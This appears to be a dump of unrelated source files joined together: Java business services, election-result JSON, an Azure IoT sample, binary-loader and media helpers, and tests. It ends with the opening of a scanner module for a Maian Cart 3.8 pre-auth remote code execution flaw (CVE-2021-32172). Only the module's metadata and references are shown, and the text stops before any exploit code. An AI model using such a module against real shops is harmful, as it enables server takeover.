and/or modify * it under the terms of the GNU General Public License as * published by the Free Software Foundation, either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public * License along with this program. If not, see * <http://www.gnu.org/licenses/gpl-2.0.html>. 
* #L% */ @Service public class VendorProductInfoService { private final IBPartnerBL bpartnerBL; private final IBPartnerProductDAO partnerProductDAO = Services.get(IBPartnerProductDAO.class); private final IBPartnerDAO bpartnersRepo = Services.get(IBPartnerDAO.class); private final IPricingConditionsRepository pricingConditionsRepo = Services.get(IPricingConditionsRepository.class); private final IProductDAO productsRepo = Services.get(IProductDAO.class); private final IProductBL productBL = Services.get(IProductBL.class); public VendorProductInfoService(@NonNull final IBPartnerBL bpartnerBL) { this.bpartnerBL = bpartnerBL; } /** * @return the default instance for the given product and org, or (if there is none) some instance; never returns null; */ public Optional<VendorProductInfo> getDefaultVendorProductInfo( @NonNull final ProductId productId, @NonNull final OrgId orgId) { final List<VendorProductInfo> vendorProductInfos = getVendorProductInfos( productId, orgId); if (vendorProductInfos.isEmpty()) { return Optional.empty(); } final VendorProductInfo defaultOrFirst = vendorProductInfos .stream() .filter(VendorProductInfo::isDefaultVendor) .findFirst() .orElseGet(() -> { Loggables.addLog("No vendorProductInfo was flagged as default; return the first one: {}", vendorProductInfos.get(0)); return vendorProductInfos.get(0); }); return Optional.of(defaultOrFirst); } public List<VendorProductInfo> getVendorProductInfos(@NonNull final ProductId productId, @NonNull final OrgId orgId) { final ProductAndCategoryAndManufacturerId product = productsRepo.retrieveProductAndCategoryAndManufacturerByProductId(productId); final Map<BPartnerId, Integer> discountSchemaIds = bpartnersRepo.retrieveAllDiscountSchemaIdsIndexedByBPartnerId(BPartnerType.VENDOR); if (discountSchemaIds.isEmpty()) { return ImmutableList.of(); // TODO: fallback to productprice } final Map<BPartnerId, I_C_BPartner_Product> bpartnerProductRecords = partnerProductDAO.retrieveByVendorIds(discountSchemaIds.keySet(), productId, orgId); final ImmutableList.Builder<VendorProductInfo> vendorProductInfos = ImmutableList.builder(); for (final Map.Entry<BPartnerId, Integer> entry : discountSchemaIds.entrySet()) { final BPartnerId vendorId = entry.getKey(); final PricingConditionsId pricingConditionsId = PricingConditionsId.ofRepoId(entry.getValue()); final I_C_BPartner_Product bpartnerProductRecord = bpartnerProductRecords.get(vendorId); final VendorProductInfo vendorProductInfo = createVendorProductInfo( vendorId, product, pricingConditionsId, bpartnerProductRecord); vendorProductInfos.add(vendorProductInfo); } return vendorProductInfos.build(); } public VendorProductInfo getVendorProductInfo( @NonNull final BPartnerId vendorId, @NonNull final ProductId productId, @NonNull final OrgId orgId) { final ProductAndCategoryAndManufacturerId product = productsRepo.retrieveProductAndCategoryAndManufacturerByProductId(productId); final int discountSchemaId = bpartnerBL.getDiscountSchemaId(vendorId, BPartnerType.VENDOR.getSOTrx()); final PricingConditionsId pricingConditionsId = PricingConditionsId.ofRepoId(discountSchemaId); final I_C_BPartner_Product bpartnerProductRecord = partnerProductDAO.retrieveByVendorId(vendorId, productId, orgId); return createVendorProductInfo( vendorId, product, pricingConditionsId, bpartnerProductRecord); } private VendorProductInfo createVendorProductInfo( @NonNull final BPartnerId vendorId, @NonNull final ProductAndCategoryAndManufacturerId product, @NonNull final PricingConditionsId pricingConditionsId, @Nullable final 
I_C_BPartner_Product bpartnerProductRecord) { final I_C_BPartner vendorRecord = bpartnersRepo.getById(vendorId); final boolean aggregatePOs = vendorRecord.isAggregatePO(); final Percent vendorFlatDiscount = Percent.of(vendorRecord.getFlatDiscount()); final PricingConditions pricingConditions = pricingConditionsRepo.getPricingConditionsById(pricingConditionsId); final ProductId productId = product.getProductId(); final String vendorProductNo = CoalesceUtil.coalesceSuppliers( () -> bpartnerProductRecord != null ? bpartnerProductRecord.getVendorProductNo() : null, () -> bpartnerProductRecord != null ? bpartnerProductRecord.getProductNo() : null, () -> productBL.getProductValue(productId)); final String vendorProductName = CoalesceUtil.coalesceSuppliers( () -> bpartnerProductRecord != null ? bpartnerProductRecord.getProductName() : null, () -> productBL.getProductName(productId)); final boolean defaultVendor = bpartnerProductRecord != null ? bpartnerProductRecord.isCurrentVendor() : false; return VendorProductInfo.builder() .vendorId(vendorId) .defaultVendor(defaultVendor) .product(product) .attributeSetInstanceId(AttributeSetInstanceId.NONE) // this might change when we incorporate attribute based pricing .vendorProductNo(vendorProductNo) .vendorProductName(vendorProductName) .aggregatePOs(aggregatePOs) .vendorFlatDiscount(vendorFlatDiscount) .pricingConditions(pricingConditions) .build(); } }
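A minimal caller sketch for the service above, not part of the metasfresh sources: it assumes Spring has injected the service, that ProductId and OrgId expose the usual ofRepoId(int) factories, and that the repo ids shown are placeholders.

// Hypothetical usage sketch for VendorProductInfoService
final ProductId productId = ProductId.ofRepoId(1000001);   // assumed product repo id
final OrgId orgId = OrgId.ofRepoId(1000000);               // assumed org repo id
final Optional<VendorProductInfo> defaultInfo =
        vendorProductInfoService.getDefaultVendorProductInfo(productId, orgId);
// An empty Optional means no vendor discount schema was found for the product;
// otherwise the default vendor is returned, falling back to the first candidate,
// as documented in getDefaultVendorProductInfo() above.
defaultInfo.ifPresent(info -> System.out.println("default vendor product info: " + info));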
2,408
348
{"nom":"Limay","circ":"8ème circonscription","dpt":"Yvelines","inscrits":9687,"abs":5552,"votants":4135,"blancs":68,"nuls":26,"exp":4041,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":901},{"nuance":"FN","nom":"<NAME>","voix":697},{"nuance":"COM","nom":"<NAME>","voix":696},{"nuance":"FI","nom":"M. <NAME>","voix":592},{"nuance":"LR","nom":"<NAME>","voix":416},{"nuance":"SOC","nom":"Mme <NAME>","voix":183},{"nuance":"DVD","nom":"<NAME>","voix":103},{"nuance":"DLF","nom":"<NAME>","voix":85},{"nuance":"DIV","nom":"Mme <NAME>","voix":76},{"nuance":"EXD","nom":"Mme <NAME>","voix":67},{"nuance":"ECO","nom":"Mme <NAME>","voix":54},{"nuance":"DIV","nom":"M. <NAME>","voix":48},{"nuance":"EXG","nom":"M. <NAME>","voix":41},{"nuance":"DVD","nom":"Mme <NAME>","voix":29},{"nuance":"DIV","nom":"Mme <NAME>","voix":25},{"nuance":"EXG","nom":"M. <NAME>","voix":18},{"nuance":"DIV","nom":"<NAME>","voix":10}]}
360
366
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- import sys import os from azure.iot.hub import IoTHubRegistryManager from azure.iot.hub.models import Twin, TwinProperties iothub_connection_str = os.getenv("IOTHUB_CONNECTION_STRING") device_id = os.getenv("IOTHUB_DEVICE_ID") def print_device_info(title, iothub_device): print(title + ":") print("device_id = {0}".format(iothub_device.device_id)) print("authentication.type = {0}".format(iothub_device.authentication.type)) print("authentication.symmetric_key = {0}".format(iothub_device.authentication.symmetric_key)) print( "authentication.x509_thumbprint = {0}".format(iothub_device.authentication.x509_thumbprint) ) print("connection_state = {0}".format(iothub_device.connection_state)) print( "connection_state_updated_tTime = {0}".format(iothub_device.connection_state_updated_time) ) print( "cloud_to_device_message_count = {0}".format(iothub_device.cloud_to_device_message_count) ) print("device_scope = {0}".format(iothub_device.device_scope)) print("etag = {0}".format(iothub_device.etag)) print("generation_id = {0}".format(iothub_device.generation_id)) print("last_activity_time = {0}".format(iothub_device.last_activity_time)) print("status = {0}".format(iothub_device.status)) print("status_reason = {0}".format(iothub_device.status_reason)) print("status_updated_time = {0}".format(iothub_device.status_updated_time)) print("") # This sample creates and uses device with SAS authentication # For other authentication types use the appropriate create and update APIs: # X509: # new_device = iothub_registry_manager.create_device_with_x509(device_id, primary_thumbprint, secondary_thumbprint, status) # device_updated = iothub_registry_manager.update_device_with_X509(device_id, etag, primary_thumbprint, secondary_thumbprint, status) # Certificate authority: # new_device = iothub_registry_manager.create_device_with_certificate_authority(device_id, status) # device_updated = iothub_registry_manager.update_device_with_certificate_authority(self, device_id, etag, status): try: # Create IoTHubRegistryManager iothub_registry_manager = IoTHubRegistryManager.from_connection_string(iothub_connection_str) # Create a device primary_key = "<KEY>" secondary_key = "<KEY>" device_state = "enabled" new_device = iothub_registry_manager.create_device_with_sas( device_id, primary_key, secondary_key, device_state ) print_device_info("create_device", new_device) # Get device information device = iothub_registry_manager.get_device(device_id) print_device_info("get_device", device) # Update device information primary_key = "<KEY>" secondary_key = "<KEY>" device_state = "disabled" device_updated = iothub_registry_manager.update_device_with_sas( device_id, device.etag, primary_key, secondary_key, device_state ) print_device_info("update_device", device_updated) # Get device twin twin = iothub_registry_manager.get_twin(device_id) print(twin) print("") additional_props = twin.additional_properties if "modelId" in additional_props: print("Model id for digital twin is") print("ModelId:" + additional_props["modelId"]) # # Replace twin new_twin = Twin() new_twin = twin new_twin.properties = TwinProperties(desired={"telemetryInterval": 9000}) print(new_twin) print("") replaced_twin = iothub_registry_manager.replace_twin(device_id, 
new_twin) print(replaced_twin) print("") # Update twin twin_patch = Twin() twin_patch.properties = TwinProperties(desired={"telemetryInterval": 3000}) updated_twin = iothub_registry_manager.update_twin(device_id, twin_patch, twin.etag) print(updated_twin) print("The twin patch has been successfully applied") # Get devices max_number_of_devices = 10 devices = iothub_registry_manager.get_devices(max_number_of_devices) if devices: x = 0 for d in devices: print_device_info("Get devices {0}".format(x), d) x += 1 else: print("No device found") # Delete the device iothub_registry_manager.delete_device(device_id) print("GetServiceStatistics") registry_statistics = iothub_registry_manager.get_service_statistics() print(registry_statistics) print("GetDeviceRegistryStatistics") registry_statistics = iothub_registry_manager.get_device_registry_statistics() print(registry_statistics) except Exception as ex: print("Unexpected error {0}".format(ex)) except KeyboardInterrupt: print("iothub_registry_manager_sample stopped")
2,001
317
import logging from ...relocation import Relocation l=logging.getLogger(name=__name__) # Reference: https://msdn.microsoft.com/en-us/library/ms809762.aspx class PEReloc(Relocation): AUTO_HANDLE_NONE = True def __init__(self, owner, symbol, addr, resolvewith=None): # pylint: disable=unused-argument super().__init__(owner, symbol, addr) self.resolvewith = resolvewith if self.resolvewith is not None: self.resolvewith = self.resolvewith.lower() def resolve_symbol(self, solist, bypass_compatibility=False, extern_object=None, **kwargs): if not bypass_compatibility: solist = [x for x in solist if self.resolvewith == x.provides] super().resolve_symbol(solist, bypass_compatibility=bypass_compatibility, extern_object=extern_object, **kwargs) if self.resolvedby is None: return # handle symbol forwarders newsym = self.resolvedby.resolve_forwarder() if newsym is None: new_symbol = extern_object.make_extern(self.symbol.name, sym_type=self.symbol.type) self.resolvedby.resolvedby = new_symbol self.resolve(new_symbol) return self.resolvedby = newsym self.symbol.resolvedby = newsym def relocate(self): if self.symbol is None: # relocation described in the DIRECTORY_ENTRY_BASERELOC table value = self.value if value is None: l.debug('Unresolved relocation with no symbol.') return self.owner.memory.store(self.relative_addr, value) else: super().relocate() @property def value(self): if self.resolved: return self.resolvedby.rebased_addr @property def is_base_reloc(self): """ These relocations are ignored by the linker if the executable is loaded at its preferred base address. There is no associated symbol with base relocations. """ return True if self.symbol is None else False @property def is_import(self): return not self.is_base_reloc
915
12,278
// Ordered slots hello world example for Boost.Signals2 // Copyright <NAME> 2001-2004. // Copyright <NAME> 2009. // // Use, modification and // distribution is subject to the Boost Software License, Version // 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) // For more information, see http://www.boost.org #include <iostream> #include <boost/signals2/signal.hpp> struct Hello { void operator()() const { std::cout << "Hello"; } }; struct World { void operator()() const { std::cout << ", World!" << std::endl; } }; //[ good_morning_def_code_snippet struct GoodMorning { void operator()() const { std::cout << "... and good morning!" << std::endl; } }; //] int main() { //[ hello_world_ordered_code_snippet boost::signals2::signal<void ()> sig; sig.connect(1, World()); // connect with group 1 sig.connect(0, Hello()); // connect with group 0 //] //[ hello_world_ordered_invoke_code_snippet // by default slots are connected at the end of the slot list sig.connect(GoodMorning()); // slots are invoked this order: // 1) ungrouped slots connected with boost::signals2::at_front // 2) grouped slots according to ordering of their groups // 3) ungrouped slots connected with boost::signals2::at_back sig(); //] return 0; }
452
2,023
#!/usr/local/bin/python -O # read faulty # for each of its arguments, it tries to copy the faulty file to the cwd import sys, os, errno import collections import cPickle as Pickle import gzip # use the correct errno reported per platform if sys.platform == 'win32': read_failed= lambda exc: exc.errno == errno.EACCES else: read_failed= lambda exc: exc.errno == errno.EIO class Chunk(object): "A description of a data chunk to be read" UNIT= 2048 BIG_UNIT= 32*UNIT def __init__(self, offset, size): self.offset= offset self.size= size def next_attempt(self): "Return sequence of chunks to retry" if self.size == self.UNIT: # a single sector failed yield self # try again in the next phase else: for ix in xrange(self.offset, self.offset+self.size, self.UNIT): yield self.__class__(ix, self.UNIT) def __getstate__(self): return self.offset, self.size def __setstate__(self, tpl): self.offset, self.size= tpl def description(self): "Return textual description of chunk" unit1= self.offset / self.UNIT unit2= (self.offset+self.size) / self.UNIT - 1 if unit1 == unit2: return "%dMiB:%d" % (self.offset//1048576, unit1) else: return "%dMiB:%d-%d" % (self.offset//1048576, unit1, unit2) class SuspectFile(object): "A file to be copied" destination= "." def __init__(self, filename, destination=None): # phase 1 contains big chunks to be read # phase 2 contains sectors to re-read # phase 3 contains chunks to store as completely failed self.filename= filename if destination is not None: self.destination= destination self.state_filename= os.path.basename(filename) + ".state" self.phase3= collections.deque() try: self.read_last_attempt_state() except IOError: # state file does not exist self.phase1= self.chunks_to_read() self.phase2= collections.deque() def chunks_to_read(self): result= collections.deque() filesize= os.path.getsize(self.filename) for offset in xrange(0, filesize, Chunk.BIG_UNIT): result.append(Chunk( offset, filesize-offset>Chunk.BIG_UNIT and Chunk.BIG_UNIT or filesize-offset)) return result def record_state(self): if self.phase1 or self.phase2 or self.phase3: fpr= gzip.open(self.state_filename, "wb") Pickle.dump(self.phase1, fpr, -1) dummy_deque= collections.deque() dummy_deque.extend(self.phase2) dummy_deque.extend(self.phase3) Pickle.dump(dummy_deque, fpr, -1) fpr.close() else: try: os.remove(self.state_filename) except OSError: pass # ignore non-existant filename @staticmethod def copy_chunk(fpi, fpo, chunk): fpi.seek(chunk.offset) data= fpi.read(chunk.size) if data: fpo.seek(chunk.offset) fpo.write(data) return data def read_last_attempt_state(self): fpr= gzip.open(self.state_filename, "rb") self.phase1= Pickle.load(fpr) self.phase2= Pickle.load(fpr) # the report_* methods are to be overloaded def report_attempt(self, chunk): "This is to be overloaded with a way to report progress" pass def report_success(self, chunk): pass def report_failure(self, chunk): pass def phase_copy(self, fpi, fpo, phase_in, phase_out): "Copy chunks from fpi to fpo storing failures in phase_out" while phase_in: chunk= phase_in.popleft() try: # to make sure this chunk is not skipped, eg by KeyboardInterrupt self.report_attempt(chunk) try: self.copy_chunk(fpi, fpo, chunk) except IOError, exc: if read_failed(exc): # the way windows reports failure for new_chunk in chunk.next_attempt(): phase_out.append(new_chunk) chunk= None self.report_failure(chunk) else: raise else: # report success, but first make sure chunk is None _, chunk= chunk, None self.report_success(_) finally: if chunk: phase_in.appendleft(chunk) def copy(self): 
"Copy the file to the local directory" fpi= open(self.filename, "rb") fpo_filename= os.path.join( self.destination, os.path.basename(self.filename)) try: fpo= open(fpo_filename, "r+b") except IOError, exc: if exc.errno == errno.ENOENT: fpo= open(fpo_filename, "wb") else: raise try: self.phase_copy(fpi, fpo, self.phase1, self.phase2) self.phase_copy(fpi, fpo, self.phase2, self.phase3) finally: self.record_state() if __name__=="__main__": class SuspectFileCmd(SuspectFile): def report_attempt(self, chunk): sys.stderr.write(chunk.description()) def report_success(self, chunk): sys.stderr.write("\r") def report_failure(self, chunk): sys.stderr.write(" failed\n") def record_state(self): super(SuspectFileCmd, self).record_state() sys.stderr.write("** remaining %d bytes in fast reads\n" % sum(chunk.size for chunk in self.phase1)) sys.stderr.write("and %d sectors in re-reads\n" % (len(self.phase2) + len(self.phase3)) ) for filename in sys.argv[1:]: faulty_file= SuspectFileCmd(filename) sys.stderr.write("copying %s\n" % filename) faulty_file.copy() sys.stderr.write("\n")
2,983
312
<reponame>RichardRanft/Torque6<gh_stars>100-1000 //----------------------------------------------------------------------------- // Copyright (c) 2015 <NAME> // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to // deal in the Software without restriction, including without limitation the // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or // sell copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS // IN THE SOFTWARE. //----------------------------------------------------------------------------- #ifndef _ANIMATION_COMPONENT_H_ #define _ANIMATION_COMPONENT_H_ #ifndef _ASSET_PTR_H_ #include "assets/assetPtr.h" #endif #ifndef _BASE_COMPONENT_H_ #include "baseComponent.h" #endif #ifndef _MESH_COMPONENT_H_ #include "meshComponent.h" #endif #ifndef _SCENE_TICKABLE_H_ #include "scene/sceneTickable.h" #endif namespace Scene { class DLL_PUBLIC AnimationComponent : public BaseComponent, public virtual SceneTickable { private: typedef BaseComponent Parent; StringTableEntry mMeshAssetId; AssetPtr<MeshAsset> mMeshAsset; SimObjectPtr<MeshComponent> mTarget; StringTableEntry mTargetName; S32 mAnimationIndex; F64 mAnimationTime; F32 mSpeed; public: AnimationComponent(); void onAddToScene(); void onRemoveFromScene(); void refresh() { } virtual void processMove( const Move *move ); virtual void interpolateMove( F32 delta ); virtual void advanceMove( F32 dt ); virtual void interpolateTick(F32 delta); virtual void processTick(); virtual void advanceTime(F32 timeDelta); static void initPersistFields(); DECLARE_CONOBJECT(AnimationComponent); F32 getSpeed() { return mSpeed; } void setSpeed(F32 val) { mSpeed = val; } SimObjectPtr<MeshComponent> getTarget() { return mTarget; } void setTarget(SimObjectPtr<MeshComponent> val) { mTarget = val; } AssetPtr<MeshAsset> getMesh() { return mMeshAsset; } void setMesh(const char* pMeshAssetId); void setAnimationIndex(U32 index); Vector<StringTableEntry> getAnimationNames(); protected: static bool setMeshField(void* obj, const char* data) { static_cast<AnimationComponent*>(obj)->setMesh( data ); return false; } static bool setAnimationIndexField(void* obj, const char* data) { static_cast<AnimationComponent*>(obj)->setAnimationIndex((U32)dAtoi(data)); return false; } }; } #endif // _ANIMATION_COMPONENT_H_
1,203
348
{"nom":"Isse","circ":"4ème circonscription","dpt":"Marne","inscrits":104,"abs":46,"votants":58,"blancs":1,"nuls":1,"exp":56,"res":[{"nuance":"LR","nom":"<NAME>","voix":42},{"nuance":"FN","nom":"M. <NAME>","voix":14}]}
89
2,416
/* * Copyright (C) 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.gvr.exoplayersupport.sample; import android.os.AsyncTask; import android.util.Log; import java.io.BufferedInputStream; import java.io.IOException; import java.io.InputStream; import java.net.HttpURLConnection; import java.net.MalformedURLException; import java.net.URL; import java.net.URLDecoder; import java.nio.charset.Charset; /** * Helper class to retrieve the dash info for a YouTube video. This is used to display the 360 * degree Jump video. * * <p>This is an abstract class that loads the information for the video, then calls * onPostExecute(). Implementations of that method can check the isCanceled() property to make sure * the information is retrieved correctly, then proceed to display the video. */ public abstract class YouTubeDashInfo { private static final String TAG = "youtubedashinfo"; private final String key; private String url; private String id; private boolean canceled; /** * Create the object. * * @param key - this is the key to the YouTube video found on the URL to the video in the browser. */ public YouTubeDashInfo(String key) { this.key = key; } /** Starts the async task to retrieve and parse the information. */ public void execute() { AsyncTask task = new AsyncTask<Object, Void, YouTubeDashInfo>() { final YouTubeDashInfo owner = YouTubeDashInfo.this; /** * Override this method to perform a computation on a background thread. The specified * parameters are the parameters passed to {@link #execute} by the caller of this task. * * <p>This method can call {@link #publishProgress} to publish updates on the UI thread. * * @param params The parameters of the task. * @return A result, defined by the subclass of this task. * @see #onPreExecute() * @see #onPostExecute * @see #publishProgress */ @Override protected YouTubeDashInfo doInBackground(Object... params) { YouTubeDashInfo info = (YouTubeDashInfo) params[0]; info.update(); return info; } /** * Applications should preferably override {@link #onCancelled(Object)}. This method is * invoked by the default implementation of {@link #onCancelled(Object)}. * * <p> * * <p>Runs on the UI thread after {@link #cancel(boolean)} is invoked and {@link * #doInBackground(Object[])} has finished. * * @see #onCancelled(Object) * @see #cancel(boolean) * @see #isCancelled() */ @Override protected void onCancelled() { super.onCancelled(); owner.setCanceled(true); owner.onPostExecute(); } /** * Runs on the UI thread after {@link #doInBackground}. The specified result is the value * returned by {@link #doInBackground}. * * <p> * * <p>This method won't be invoked if the task was cancelled. * * @param dashInfo The result of the operation computed by {@link #doInBackground}. * @see #onPreExecute * @see #doInBackground * @see #onCancelled(Object) */ @Override protected void onPostExecute(YouTubeDashInfo dashInfo) { super.onPostExecute(dashInfo); dashInfo.onPostExecute(); } }; // kick off the async task here. 
task.execute(this); } /** This is called when the background processing is completed. */ protected abstract void onPostExecute(); /** Method to retrieve the information from YouTube and parse it. */ private void update() { URL url; try { url = new URL("http://www.youtube.com/get_video_info?&video_id=" + key); } catch (MalformedURLException e) { Log.e(TAG, "Exception parsing url", e); setCanceled(true); return; } HttpURLConnection urlConnection; try { urlConnection = (HttpURLConnection) url.openConnection(); urlConnection.setInstanceFollowRedirects(true); } catch (IOException e) { Log.e(TAG, "Exception getting " + url, e); setCanceled(true); return; } try { InputStream in = new BufferedInputStream(urlConnection.getInputStream()); readStream(in); } catch (IOException e) { Log.e(TAG, "Exception reading response of " + url, e); setCanceled(true); } finally { urlConnection.disconnect(); } } /** * Method to parse the response from YouTube. We are only interested in the dashmpd information, * so we skip all the other, and return when we have found what we need. * * @param in - the inputstream containing the response. * @throws IOException - when there is a problem. */ private void readStream(InputStream in) throws IOException { int len = 16 * 1024; byte[] buf = new byte[len]; int read = 1; int tot = 0; String s = ""; while (read > 0) { read = in.read(buf); if (read > 0) { tot += read; s += new String(buf, 0, read); } } s = URLDecoder.decode(s, Charset.defaultCharset().name()); String[] parts = s.split("&"); url = "read " + tot + " bytes"; for (String p : parts) { if (p.startsWith("dashmpd=")) { String val = p.substring("dashmpd=".length()); url = URLDecoder.decode(val, Charset.defaultCharset().name()); // pull out the content ID also. int idx = url.indexOf("/id/"); if (idx >= 0) { String id = url.substring(idx); idx = id.length() > 4 ? id.indexOf("/", 5) : -1; if (idx > 0) { id = id.substring(4, id.indexOf("/", 5)); this.id = id; return; } } // if we're not done, keep reading the input stream. break; } } } /** * The URL to the video stream. * * @return non-null once execute() has completed successfully. */ public String getUrl() { return url; } /** * The content ID of the video stream. * * @return non-null once execute() has completed successfully. */ public String getId() { return id; } protected void setCanceled(boolean canceled) { this.canceled = canceled; } /** @return true if processing of the request was canceled. */ public boolean isCanceled() { return canceled; } }
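A minimal sketch of how the abstract class above might be subclassed, not part of the original sample: the video key is a placeholder, and the log tag and messages are assumptions.

// Hypothetical usage sketch: resolve the DASH manifest for a video key and log it.
YouTubeDashInfo dashInfo = new YouTubeDashInfo("someVideoKey") {  // placeholder key
    @Override
    protected void onPostExecute() {
        if (isCanceled()) {
            Log.w("DashInfoSample", "Failed to resolve the DASH info");
            return;
        }
        // getUrl() and getId() are populated once execute() has completed successfully.
        Log.d("DashInfoSample", "url=" + getUrl() + " id=" + getId());
    }
};
dashInfo.execute();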
2,825
411
<filename>documents4j-util-conversion/src/main/java/com/documents4j/job/InputStreamSourceFromFileSource.java<gh_stars>100-1000 package com.documents4j.job; import com.documents4j.api.IFileSource; import com.documents4j.api.IInputStreamSource; import com.documents4j.throwables.FileSystemInteractionException; import com.google.common.base.MoreObjects; import com.google.common.io.Closeables; import java.io.*; class InputStreamSourceFromFileSource implements IInputStreamSource { private final IFileSource fileSource; private volatile File file; public InputStreamSourceFromFileSource(IFileSource fileSource) { this.fileSource = fileSource; } @Override public InputStream getInputStream() { file = fileSource.getFile(); try { FileInputStream fileInputStream = new FileInputStream(file); fileInputStream.getChannel().lock(0L, Long.MAX_VALUE, true); return fileInputStream; } catch (FileNotFoundException e) { throw new FileSystemInteractionException(String.format("Could not find file %s", file), e); } catch (IOException e) { throw new FileSystemInteractionException(String.format("Could not read file %s", file), e); } } @Override public void onConsumed(InputStream inputStream) { try { close(inputStream); } finally { fileSource.onConsumed(file); } } private void close(InputStream inputStream) { try { Closeables.close(inputStream, false); } catch (IOException e) { throw new FileSystemInteractionException(String.format("Could not close stream for file %s", file), e); } } @Override public String toString() { return MoreObjects.toStringHelper(InputStreamSourceFromFileSource.class) .add("file", file) .add("fileSource", fileSource) .toString(); } }
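A same-package usage sketch for the adapter above (the class is package-private), not part of documents4j: fileSource stands for some existing IFileSource implementation, and the conversion step is a placeholder.

// Hypothetical usage sketch: obtain a shared-locked stream, consume it, then release it.
IInputStreamSource source = new InputStreamSourceFromFileSource(fileSource);
InputStream inputStream = source.getInputStream();  // opens the file and takes a shared lock
try {
    // ... hand inputStream to a converter here ...
} finally {
    // closes the stream and forwards the notification to the wrapped IFileSource
    source.onConsumed(inputStream);
}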
779
14,499
/*
 * Copyright (c) Facebook, Inc. and its affiliates.
 *
 * This source code is licensed under the MIT license found in the
 * LICENSE file in the root directory of this source tree.
 */

#pragma once

#include "project_lib.h"

// even though it's unused, it should be translated if compiled source is
// main.cpp (or a symbolic link pointing to it)
int unused_deref_in_header(int* a) {
  int x = internal::used_in_main_header(0);
  return *a;
}
139
2,023
import re

DIGITS = re.compile(r'[0-9]+')

def compnum(x, y):
    nx = ny = 0
    while True:
        a = DIGITS.search(x, nx)
        b = DIGITS.search(y, ny)
        if None in (a, b):
            return cmp(x[nx:], y[ny:])
        r = (cmp(x[nx:a.start()], y[ny:b.start()])
             or cmp(int(x[a.start():a.end()]), int(y[b.start():b.end()])))
        if r:
            return r
        nx, ny = a.end(), b.end()

#
# sample
#
L1 = ["file~%d.txt" % i for i in range(1, 15)]
L2 = L1[:]
L1.sort()
L2.sort(compnum)
for i, j in zip(L1, L2):
    print "%15s %15s" % (i, j)
347
971
package com.ucar.datalink.manager.core.flinker.cron.entity; /** * Created by yang.wang09 on 2019-02-13 15:51. */ public class EntityCronMaxRuntime { }
58
578
/* * Copyright (C) 2016 Red Hat, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.syndesis.integration.component.proxy; import org.apache.camel.CamelContext; import org.apache.camel.Endpoint; import org.apache.camel.impl.DefaultCamelContext; import org.apache.camel.util.CollectionHelper; import org.junit.jupiter.api.Test; import com.acme.corp.AcmeComponent; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatExceptionOfType; public class CustomComponentTest { @Test public void testCustomComponent() { assertThatExceptionOfType(IllegalArgumentException.class).isThrownBy(() -> new ComponentProxyComponent("acme-1", "acme")) .withMessage( "Failed to find component definition for scheme 'acme'. Missing component definition in classpath 'org/apache/camel/catalog/components/acme.json'"); } @Test public void testCustomComponentEndpoint() throws Exception { final CamelContext context = new DefaultCamelContext(); final ComponentProxyComponent component = new ComponentProxyComponent("acme-1", "acme", AcmeComponent.class); component.setCamelContext(context); component.setOptions(CollectionHelper.mapOf("name", "test", "param", "p1")); component.start(); final Endpoint endpoint = component.createEndpoint("acme"); assertThat(endpoint).isInstanceOf(ComponentProxyEndpoint.class); assertThat(endpoint).hasFieldOrPropertyWithValue("delegateEndpointUri", "acme://test?param=p1"); } @Test public void testCustomComponentWithClass() { final ComponentProxyComponent proxyComponent = new ComponentProxyComponent("acme-1", "acme", AcmeComponent.class); assertThat(proxyComponent.getComponentId()).isEqualTo("acme-1"); assertThat(proxyComponent.getComponentScheme()).isEqualTo("acme"); } @Test public void testCustomComponentWithClassName() { final ComponentProxyComponent proxyComponent = new ComponentProxyComponent("acme-1", "acme", AcmeComponent.class.getName()); assertThat(proxyComponent.getComponentId()).isEqualTo("acme-1"); assertThat(proxyComponent.getComponentScheme()).isEqualTo("acme"); } }
909
421
import requests
import random
import string

# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Maian Cart 3.8 preauth RCE''',
        "description": '''A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.''',
        "severity": "critical",
        "references": [
            "https://dreyand.github.io/maian-cart-rce/",
            "https://github.com/DreyAnd/maian-cart-rce",
            "https://www.maianscriptworld.co.uk/critical-updates",
            "https://nvd.nist.gov/vuln/detail/CVE-2021-32172"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
